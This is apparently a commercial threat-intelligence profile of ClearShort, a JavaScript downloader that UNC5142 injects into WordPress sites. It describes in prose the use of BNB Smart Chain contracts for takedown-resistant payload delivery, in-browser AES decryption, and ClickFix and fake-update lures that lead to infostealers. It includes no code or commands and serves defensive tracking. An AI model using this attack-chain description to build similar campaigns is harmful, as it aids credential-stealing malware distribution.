Skip to main content
Mallory
Back to malware
MalwareUsed by 1 actor

CLEARSHORT

ClearShort is a multi-stage JavaScript downloader used in UNC5142 malware distribution campaigns and described as an evolution/variant of the ClearFake framework. It is injected into compromised WordPress sites, including plugin files, theme files, and WordPress databases, and has been used at scale across thousands of compromised web pages. ClearShort uses BNB Smart Chain smart contracts as its control layer as part of the broader EtherHiding technique, retrieving additional malicious payloads from blockchain-hosted infrastructure that is resilient to takedown. Google reported UNC5142 evolved this infrastructure from a single smart contract to a three-contract architecture resembling a proxy pattern, enabling rapid updates to payload delivery without reinfecting sites.

Operationally, ClearShort bridges compromised browsers to the blockchain and uses legitimate libraries such as web3.min.js, pako.min.js, and crypto-js.min.js for blockchain interaction, decompression, and decryption. Retrieved data is Base64-encoded, Gzip-compressed, and, since December 2024, AES-encrypted; payloads are decrypted in the browser using AES-GCM and then executed. ClearShort connects to BNB Smart Chain through public nodes or related API services and may fetch landing pages from external infrastructure, including Cloudflare pages.dev-hosted lures.

The infection chain relies on social engineering, particularly ClickFix-style prompts, fake Cloudflare verification, and fake Chrome update lures that trick victims into executing malicious commands. On Windows, observed chains used an HTA file from MediaFire to drop a PowerShell script that fetched final payloads from GitHub, MediaFire, or attacker-controlled infrastructure. On macOS, victims were prompted to run a bash command that downloaded a shell script leading to Atomic Stealer. Malware families distributed via ClearShort-linked UNC5142 activity include Atomic (AMOS), Lumma/Lummac.V2, Rhadamanthys (RadThief), and Vidar. The activity targets both Windows and macOS users visiting compromised sites. High-confidence associations in the provided content tie ClearShort to financially motivated actor UNC5142 and large-scale compromises of WordPress websites used to distribute infostealers.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
UNC5142

The technical backbone of this operation is CLEARSHORT, a multistage JavaScript downloader designed to bridge compromised browsers with the blockchain.

via picus security blogpicussecurity.com
INDICATORS OF COMPROMISE

IOCs tracked for this family

1 indicator attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Hashes
1 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

TypeValueLatest sighting
hash.sha1●●●●●●●●●●●●View more in app6 months ago
ACTIVITY FEED

Recent activity

5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

5 SOURCESView more in app
picus security blogNews
Dec 4, 2025
EtherHiding: How Web3 Infrastructure Enables Stealthy Malware Distribution

CLEARSHORT is a multistage JavaScript downloader used by UNC5142 to retrieve and execute malicious payloads from blockchain-based infrastructure. It leverages a three-tier smart contract architecture on the BNB Smart Chain to dynamically fetch, decrypt, and execute payloads in the victim's browser, evading traditional C2 takedown methods.

Read more
cso onlineNews
Oct 17, 2025
North Korean threat actors turn blockchains into malware delivery servers

Evolved CLEARFAKE variant used on compromised WordPress sites; leverages Web3.js to interact with BNB Smart Chain via a public node and retrieve payload components from smart contracts (including via an upgradable proxy-pattern contract architecture).

Read more
govinfosecurityNews
Oct 16, 2025
Hackers Use Blockchain to Hide Malware in Plain Sight

JavaScript downloader injected into compromised WordPress sites, using blockchain smart contracts for command and control. Used by UNC5142 to distribute infostealers.

Read more
the hacker newsNews
Oct 16, 2025
Hackers Abuse Blockchain Smart Contracts to Spread Malware via Infected WordPress Sites

A multi-stage JavaScript downloader used to deliver stealer malware by retrieving payloads from blockchain smart contracts and external servers. Assessed to be a variant of ClearFake.

Read more
+1 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching1

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution1

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.